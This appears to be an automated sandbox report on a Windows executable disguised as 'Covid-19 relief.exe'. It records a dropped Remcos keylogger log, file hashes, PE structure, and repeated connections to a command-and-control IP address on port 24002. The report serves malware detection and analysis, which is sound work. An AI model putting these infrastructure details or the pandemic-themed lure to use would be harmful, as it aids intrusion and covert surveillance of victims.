                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._................................. ... ....@.. ..............................m.....@.....................................S.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H...........e...........<...{..........................................6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r#..p.....*..{%...*..{&...*..{'...*r.(......}%.....}&.....}'...*..{5...*..{6...*V.(......}5.....}6...*. ...N )UU.Z()....{5...o/...X )UU.Z(+....{6...o0...X*J.s<....sB...o2...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*
                                C:\Users\user\AppData\Roaming\Covid-19:Zone.Identifier
                                Process:C:\Users\user\Desktop\Covid-19 relief.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview: [ZoneTransfer]....ZoneId=0
                                C:\Users\user\AppData\Roaming\remcos\logs.dat
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):74
                                Entropy (8bit):4.7652538331522365
                                Encrypted:false
                                SSDEEP:3:ttVPwA2yArA4RXMRPHv31aeo:t4A2bXqdHv3IP
                                MD5:9CEF22D83CEF7595DDD6342F8185EB58
                                SHA1:8CF40A7F465CE527BC0C85A39452FC884386057E
                                SHA-256:FA0797C727ED6676658DAA728CFD161E8A380BDCD7498FB2B58CC3060122CDBF
                                SHA-512:3E1E2DB88FCBD27153F5CEB46EFA4FB518999367D6DB9A3E2E5C73951FED608D44BB86AAEA56C8F00DDF64617EF1B88CB1FDBDD222F81CE8F8D947477F6140E5
                                Malicious:true
                                Reputation:low
                                Preview: ..[2020/11/18 14:54:37 Offline Keylogger Started]....[ Program Manager ]..

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.092997016800572
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:Covid-19 relief.exe
                                File size:560640
                                MD5:5dd2c165636eff7f866e18370351101e
                                SHA1:1a25c2d60553096a67b3c87c6385d3e831e84647
                                SHA256:e85de613abef99e65212dcd6f8077b03763fa37fa81e7921907c9e9c3859b632
                                SHA512:2b70590453acad83096da738c43f2cd2060f654999b485fb4873d2f2d82875e5d659c0616698d75a1ea78e7aea625e9b5a34f3211b5288cf71151d0087ba48e5
                                SSDEEP:6144:oL+0RTQHdWvvurs1UGKuOYmk3auPnfyuSkwzAT0Yne6cjnuQwG2U9bZ8BjAPuE5x:b0x4YvWgqe1fSDzY3e6caBGV9b3PuIT
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_................................. ... ....@.. ..............................m.....@................................

                                File Icon

                                Icon Hash:07d8d8d4d4d85106

                                Static PE Info

                                General

                                Entrypoint:0x461dee
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x5FB4E4F8 [Wed Nov 18 09:10:16 2020 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x61d980x53.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x28bfe.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x5fdf40x5fe00False0.891577371252data7.87913546933IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc0x620000x28bfe0x28c00False0.0640756805982data3.06126871257IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x8c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_ICON0x625080x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 741092604, next used block 741092396EnglishUnited States
                                RT_ICON0x627f00x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                RT_ICON0x629180x2ca8dBase IV DBT of \300.DBF, block length 9216, next free block index 40, next free block 16843009, next used block 16843009EnglishUnited States
                                RT_ICON0x655c00x1bc8dataEnglishUnited States
                                RT_ICON0x671880x1628dBase IV DBT of \200.DBF, blocks size 0, block length 4096, next free block index 40, next free block 4294967295, next used block 4294967295EnglishUnited States
                                RT_ICON0x687b00x1418dataEnglishUnited States
                                RT_ICON0x69bc80xea8dataEnglishUnited States
                                RT_ICON0x6aa700xba8dataEnglishUnited States
                                RT_ICON0x6b6180x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                RT_ICON0x6bec00x6c8dataEnglishUnited States
                                RT_ICON0x6c5880x608dataEnglishUnited States
                                RT_ICON0x6cb900x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                RT_ICON0x6d0f80xcd1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                RT_ICON0x6ddcc0x94a8dataEnglishUnited States
                                RT_ICON0x772740x5488dataEnglishUnited States
                                RT_ICON0x7c6fc0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                RT_ICON0x809240x3a48dataEnglishUnited States
                                RT_ICON0x8436c0x25a8dataEnglishUnited States
                                RT_ICON0x869140x1a68dataEnglishUnited States
                                RT_ICON0x8837c0x10a8dataEnglishUnited States
                                RT_ICON0x894240x988dataEnglishUnited States
                                RT_ICON0x89dac0x6b8dataEnglishUnited States
                                RT_ICON0x8a4640x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                RT_GROUP_ICON0x8a8cc0x148dataEnglishUnited States
                                RT_MANIFEST0x8aa140x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 18, 2020 14:54:38.225730896 CET4973824002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:54:41.232978106 CET4973824002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:54:47.249085903 CET4973824002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:54:59.362494946 CET4974824002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:02.453527927 CET4974824002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:08.454018116 CET4974824002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:08.611758947 CET2400249748194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:09.668634892 CET4975024002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:09.846461058 CET2400249750194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:10.454247952 CET4975024002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:10.622406960 CET2400249750194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:11.157363892 CET4975024002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:11.683342934 CET2400249750194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:11.761576891 CET4975124002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:11.923325062 CET2400249751194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:12.423002958 CET4975124002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:12.731446028 CET2400249751194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:13.235574007 CET4975124002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:13.396514893 CET2400249751194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:14.466391087 CET4975324002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:14.634411097 CET2400249753194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:15.142010927 CET4975324002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:15.443422079 CET2400249753194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:15.954586029 CET4975324002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:16.120750904 CET2400249753194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:16.162445068 CET4975424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:16.321444035 CET2400249754194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:16.829878092 CET4975424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:16.992496014 CET2400249754194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:17.501595974 CET4975424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:17.661499023 CET2400249754194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:18.716056108 CET4975824002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:18.876467943 CET2400249758194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:19.392349958 CET4975824002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:19.551531076 CET2400249758194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:20.064301014 CET4975824002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:20.246874094 CET2400249758194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:20.293386936 CET4976324002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:23.298928022 CET4976324002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:23.456409931 CET2400249763194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:23.970844984 CET4976324002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:24.141777039 CET2400249763194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:25.183841944 CET4976724002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:25.341454029 CET2400249767194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:25.846010923 CET4976724002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:26.043688059 CET2400249767194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:26.549175024 CET4976724002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:26.811487913 CET2400249767194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:26.856172085 CET4976924002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:27.016520023 CET2400249769194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:27.518024921 CET4976924002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:27.766252041 CET2400249769194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:28.268088102 CET4976924002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:28.563649893 CET2400249769194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:29.644694090 CET4977024002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:29.813522100 CET2400249770194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:30.315395117 CET4977024002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:30.476442099 CET2400249770194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:30.987042904 CET4977024002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:31.291639090 CET2400249770194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:31.337646008 CET4977124002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:31.496845961 CET2400249771194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:32.002934933 CET4977124002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:32.243675947 CET2400249771194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:32.752891064 CET4977124002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:32.911382914 CET2400249771194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:33.966433048 CET4977524002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:34.163474083 CET2400249775194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:34.674875975 CET4977524002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:34.963396072 CET2400249775194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:35.472045898 CET4977524002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:35.631544113 CET2400249775194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:35.671389103 CET4977624002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:35.831581116 CET2400249776194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:36.331278086 CET4977624002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:36.563554049 CET2400249776194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:37.065690041 CET4977624002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:37.233525991 CET2400249776194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:38.279948950 CET4978224002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:38.483325005 CET2400249782194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:38.987869024 CET4978224002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:39.146400928 CET2400249782194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:39.659832001 CET4978224002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:39.821413994 CET2400249782194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:39.866189003 CET4978324002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:40.026171923 CET2400249783194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:40.534735918 CET4978324002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:40.731271982 CET2400249783194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:41.238308907 CET4978324002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:41.401384115 CET2400249783194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:42.451513052 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:42.636526108 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:43.144352913 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:43.313544035 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:43.816250086 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:44.083539963 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:44.083707094 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:44.085088968 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:44.301654100 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:46.096513987 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:46.099152088 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:46.541502953 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:46.541579008 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:46.613504887 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:46.831348896 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:51.111601114 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:51.114530087 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:51.316421032 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:56.111463070 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:55:56.116578102 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:55:56.326668978 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:01.143480062 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:01.145800114 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:56:01.361553907 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:06.153598070 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:06.208774090 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:56:06.301815987 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:56:06.516447067 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:11.169435978 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:11.171740055 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:56:11.386425972 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:16.171266079 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:16.175580025 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:56:16.506519079 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:56:16.516299963 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:16.516453028 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:56:16.811734915 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:21.163872957 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:21.167309046 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:56:21.381407022 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:26.190315008 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:26.192971945 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:56:26.406259060 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:31.176311016 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:31.179244995 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:56:31.391501904 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:36.196535110 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:36.202852011 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:56:36.424360037 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:41.236294985 CET2400249784194.5.97.21192.168.2.4
                                Nov 18, 2020 14:56:41.237003088 CET4978424002192.168.2.4194.5.97.21
                                Nov 18, 2020 14:56:41.452739954 CET2400249784194.5.97.21192.168.2.4

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 18, 2020 14:54:27.937761068 CET5299153192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:27.964799881 CET53529918.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:28.611057997 CET5370053192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:28.638083935 CET53537008.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:29.417045116 CET5172653192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:29.444787025 CET53517268.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:30.061810017 CET5679453192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:30.088855982 CET53567948.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:31.054399014 CET5653453192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:31.089924097 CET53565348.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:32.444787025 CET5662753192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:32.480277061 CET53566278.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:33.096683025 CET5662153192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:33.123822927 CET53566218.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:38.182744980 CET6311653192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:38.219892025 CET53631168.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:38.390829086 CET6407853192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:38.417867899 CET53640788.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:45.791676998 CET6480153192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:45.819010973 CET53648018.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:46.533797979 CET6172153192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:46.560875893 CET53617218.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:47.169581890 CET5125553192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:47.197050095 CET53512558.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:47.834986925 CET6152253192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:47.862046957 CET53615228.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:50.586304903 CET5233753192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:50.621925116 CET53523378.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:51.500574112 CET5504653192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:51.527715921 CET53550468.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:56.872952938 CET4961253192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:56.900316000 CET53496128.8.8.8192.168.2.4
                                Nov 18, 2020 14:54:59.324421883 CET4928553192.168.2.48.8.8.8
                                Nov 18, 2020 14:54:59.361639977 CET53492858.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:02.993257046 CET5060153192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:03.032303095 CET53506018.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:09.630620003 CET6087553192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:09.666126966 CET53608758.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:11.723577023 CET5644853192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:11.760684013 CET53564488.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:14.138016939 CET5917253192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:14.165600061 CET53591728.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:14.438481092 CET6242053192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:14.465570927 CET53624208.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:16.125231028 CET6057953192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:16.160991907 CET53605798.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:17.453891993 CET5018353192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:17.489213943 CET53501838.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:18.086395979 CET6153153192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:18.121903896 CET53615318.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:18.528800964 CET4922853192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:18.568495035 CET53492288.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:18.678056955 CET5979453192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:18.715112925 CET53597948.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:19.145800114 CET5591653192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:19.183402061 CET53559168.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:19.475662947 CET5275253192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:19.519607067 CET53527528.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:19.530215979 CET6054253192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:19.565695047 CET53605428.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:20.077578068 CET6068953192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:20.114319086 CET53606898.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:20.255029917 CET6420653192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:20.291959047 CET53642068.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:23.544162989 CET5090453192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:23.571329117 CET53509048.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:24.136522055 CET5752553192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:24.174145937 CET53575258.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:24.796408892 CET5381453192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:24.831772089 CET53538148.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:25.147579908 CET5341853192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:25.183108091 CET53534188.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:25.474762917 CET6283353192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:25.510293007 CET53628338.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:26.819869041 CET5926053192.168.2.48.8.8.8
